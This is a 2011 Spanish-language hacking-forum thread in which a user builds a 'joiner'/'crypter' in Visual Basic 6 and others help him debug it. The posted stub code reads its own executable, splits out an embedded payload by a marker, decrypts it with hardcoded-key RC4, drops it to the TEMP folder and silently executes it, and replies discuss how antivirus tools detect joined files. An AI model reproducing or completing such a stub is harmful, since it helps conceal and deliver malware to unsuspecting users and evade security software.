elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  [Duda] Generar archivos ejecutables a partir de los bytes originales
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Duda] Generar archivos ejecutables a partir de los bytes originales  (Leído 3,690 veces)
mastercss

Desconectado Desconectado

Mensajes: 36


Ver Perfil
[Duda] Generar archivos ejecutables a partir de los bytes originales
« en: 27 Septiembre 2011, 07:15 am »

Quizas en el titulo no este muy bien definidad mi duda, asi que me dispodnre a aclararla. Mi idea, es conseguir los bytes que componen dos archivos ( una imagen y un ejecutable por ejemplo). Guardar esos bytes en dos variables diferentes, convertir esos bytes en programas y despues ejecutarlos. Todo ello desde vba claro esta. ¿Como podria sacar los bytes en hexadecimal de dos programas que yo elija y que un tercero, con esos bytes, los genere en disco, los ejecute y como no los copie a diferentes directorios del sistema?

Puede sonar complicado pero quiero ahcer algo parecido a esto...dejo el link del blog que por cierto seguro que alguno conoceis y sino, no tiene perdida, es la leche.

http://www.flu-project.com/ocultando-un-ejecutable-creando-nuestro-%E2%80%9Cjoiner%E2%80%9D-casero.html

De momento he hecho un trocito de codigo sencillo, lo dejo para que veais lo que quiero hacer.

Código
  1. Private Sub Command1_Click()
  2.    With pp
  3.        .DialogTitle = "Elige el primer archivo"
  4.        .Filter = "Ejecutables|*.exe"
  5.        .ShowOpen
  6.    End With
  7. arcUno.Text = pp.FileName
  8. End Sub
  9.  
  10. Private Sub Command2_Click()
  11.    With pp
  12.        .DialogTitle = "Elige el segundo archivo"
  13.        .Filter = "Todo tipo de archivos|*"
  14.        .ShowOpen
  15.    End With
  16. arcDos.Text = pp.FileName
  17. End Sub
  18.  
  19. Private Sub Command3_Click()
  20. Dim Data() As Byte
  21. Dim DataLon As Long
  22. Open arcUno For Binary Lock Read As 1
  23. Open arcDos For Binary Lock Read As 2
  24. Open byteRes For Binary Access Write As 3
  25. DataLon = FileLen(arcUno) + Len(arcDos)
  26. ReDim Data(DataLon) As Byte
  27. Get #1, , Data
  28. Get #2, , Data
  29. Put #3, , Hex(Data(DataLon))
  30. Close
  31. End Sub


« Última modificación: 27 Septiembre 2011, 07:17 am por mastercss » En línea

x64core


Desconectado Desconectado

Mensajes: 1.908


Ver Perfil
Re: [Duda] Generar archivos ejecutables a partir de los bytes originales
« Respuesta #1 en: 27 Septiembre 2011, 07:41 am »

un joiner  ;D
generalmente se hace un split a las cadenas o bytes que has de dejar una marca para separarlos
aunque como me ah dicho Karcrack eso es vergonzoso y es verdad ;D y tambien
porque me ah dicho que los AVs detectan rapido los archivos "pegados"


En línea

Elemental Code


Desconectado Desconectado

Mensajes: 622


Im beyond the system


Ver Perfil
Re: [Duda] Generar archivos ejecutables a partir de los bytes originales
« Respuesta #2 en: 27 Septiembre 2011, 17:45 pm »

para juntar un exe y una imagen es necesario un tercer pedacito de programa llamado stub.

Se encarga de buscar en su propio codigo las dos partes y ejecutarlas.
Existen con RUNPE y de extraccion.
Busca en google :D
En línea

I CODE FOR $$$
Programo por $$$
Hago tareas, trabajos para la facultad, lo que sea en VB6.0

Mis programas
mastercss

Desconectado Desconectado

Mensajes: 36


Ver Perfil
Re: [Duda] Generar archivos ejecutables a partir de los bytes originales
« Respuesta #3 en: 28 Septiembre 2011, 17:29 pm »

Ok haciendo mi crypter al final ams que un binder, tengo un epqueño problema en el stub, me da Run-Time error 9 Subscript out of range.

A continuación pongo el code de mi stub.

Código
  1. Option Explicit
  2. Sub Main()
  3. Dim Yo As String, Datos As String, sData() As String
  4. Yo = App.Path & "\" & App.EXEName & ".exe"
  5.  
  6. Open Yo For Binary As #1
  7.    Datos = Space(LOF(1))
  8.    Get #1, , Datos
  9. Close #1
  10.  
  11. sData() = Split(Datos, "%%##%%")
  12.  
  13. sData(1) = RC4(sData(1), "ma5t3r") 'linea que me tira el error
  14.  
  15. Open Environ("TEMP") & "\tmp.exe" For Binary As #1
  16.    Put #1, , sData(1)
  17. Close #1
  18.  
  19. Shell Environ("ComSpec") & " /c start " & Environ("TEMP") & "\tmp.exe", vbHide
  20.  
  21. End Sub
  22. Private Function RC4(ByVal expresion As String, ByVal password As String) As String
  23.    Dim i As Integer, j As Integer, t As Integer, tmp As Integer, s(256) As Integer, k(256) As Integer
  24.    Dim key() As Byte, byteArray() As Byte
  25.    Dim i2 As Long
  26.  
  27.    key() = StrConv(password, vbFromUnicode)
  28.    For i = 0 To 255
  29.        s(i) = i
  30.        k(i) = key(i Mod Len(password))
  31.    Next i
  32.    For i = 0 To 255
  33.        j = (j + s(i) + k(i)) Mod 256
  34.        tmp = s(i)
  35.        s(i) = s(j)
  36.        s(j) = tmp
  37.    Next i
  38.    byteArray() = StrConv(expresion, vbFromUnicode)
  39.    i = 0
  40.    j = 0
  41.    For i2 = 0 To Len(expresion) - 1
  42.        i = (i + 1) Mod 256
  43.        j = (j + s(i)) Mod 256
  44.        tmp = s(i)
  45.        s(i) = s(j)
  46.        s(j) = tmp
  47.        t = (s(i) + s(j)) Mod 256
  48.        byteArray(i2) = byteArray(i2) Xor s(t)
  49.    Next i2
  50.    RC4 = StrConv(byteArray, vbUnicode)
  51. End Function
  52.  
  53.  

Gracias por adelantado
« Última modificación: 28 Septiembre 2011, 19:58 pm por mastercss » En línea

ignorantev1.1


Desconectado Desconectado

Mensajes: 617


/\ Así acabo cuando quiero programar...


Ver Perfil WWW
Re: [Duda] Generar archivos ejecutables a partir de los bytes originales
« Respuesta #4 en: 28 Septiembre 2011, 20:42 pm »

Emmmm probablemente solo resulte un array con un elemento "sData(0)", ya sea porque en el archivo que tratas de abrir no está colocada dicha "firma":

Código
  1. sData(1) = RC4(sData(1), "ma5t3r") 'linea que me tira el error

Antes de la linea de arriba prueba poniendo:

Código
  1. Msgbox ubound(sData)

Y nos cuentas lo que resultó.

Saludos!
En línea

mastercss

Desconectado Desconectado

Mensajes: 36


Ver Perfil
Re: [Duda] Generar archivos ejecutables a partir de los bytes originales
« Respuesta #5 en: 29 Septiembre 2011, 04:38 am »

Me sale un MsgBox con un 2. Si aydua de algo puedo poner el código del crypter tambien.
En línea

Elemental Code


Desconectado Desconectado

Mensajes: 622


Im beyond the system


Ver Perfil
Re: [Duda] Generar archivos ejecutables a partir de los bytes originales
« Respuesta #6 en: 30 Septiembre 2011, 03:37 am »

pone en otra variable el dato descifrado.

Código
  1. sOrig = RC4(sData(1), "ma5t3r")
En línea

I CODE FOR $$$
Programo por $$$
Hago tareas, trabajos para la facultad, lo que sea en VB6.0

Mis programas
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines